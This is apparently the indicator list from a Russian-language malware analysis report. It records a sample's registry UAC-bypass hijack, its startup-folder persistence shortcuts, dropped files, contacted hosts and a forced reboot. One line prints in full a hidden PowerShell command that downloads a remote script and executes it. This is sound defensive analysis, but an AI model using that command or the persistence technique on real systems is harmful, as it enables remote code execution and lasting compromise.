Техническая информация
- [HKCU\Software\Classes\ms-settings\Shell\Open\command] '' = 'C:\_qdapxj6_\_qdapxj6_i7.exe'
- %APPDATA%\microsoft\windows\start menu\programs\startup\_qdapxj6_.lnk
- %APPDATA%\microsoft\windows\start menu\programs\startup\_qdapxj6_ex.lnk
- %APPDATA%\microsoft\windows\start menu\programs\startup\_qdapxj6_at.lnk
- %APPDATA%\microsoft\windows\start menu\programs\startup\_qdapxj6_aa.lnk
- %APPDATA%\microsoft\windows\start menu\programs\startup\_qdapxj6_y.lnk
- http://dftssa.3utilities.com/03/17
- C:\_qdapxj6_\iwqjzitet_qdapxj6_
- C:\users\public\iwqjzitet_qdapxj6_.cmd
- C:\_qdapxj6_\iwqjzitet_qdapxj6_y
- C:\users\public\iwqjzitet_qdapxj6_y.cmd
- C:\users\public\231123
- 'df####.3utilities.com':80
- 'dr##box.com':443
- http://df####.3utilities.com/03/17
- http://15#.#23.16.114/nv/index.php
- http://df####.3utilities.com/03/?=
- 'dr##box.com':443
- DNS ASK df####.3utilities.com
- DNS ASK dr##box.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass -Command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://dftssa.3utilities.com/03/17')"' (со скрытым окном)
- '<SYSTEM32>\shutdown.exe' /r /t 15